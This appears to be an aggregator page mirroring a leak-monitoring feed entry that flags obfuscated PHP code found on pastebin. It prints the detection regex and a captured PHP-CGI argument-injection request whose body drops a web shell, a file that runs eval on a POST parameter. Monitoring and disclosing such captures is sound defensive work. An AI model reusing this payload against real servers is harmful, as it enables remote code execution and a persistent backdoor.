Quantcast
Channel: Obfuscated PHP Code – LeakedIn
Viewing all articles
Browse latest Browse all 222

Potential leak of data: Obfuscated PHP Code

$
0
0
Detected 1 occurrence(s) of ‘\?php.*(eval|urldecode)\(.*\>’: POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 t=<?php $f='wt'.rand(1000,9999).'n.php';@file_put_contents($f,'<'.'?php eval(stripslashes(@$_POST[(chr(112).chr(49))])); ?'.'>');echo 'wevm8346[..[..['.$f.']..]..]wqer23';exit; ?> Source: http://pastebin.com/raw.php?i=C7pxNgRE

Viewing all articles
Browse latest Browse all 222

Trending Articles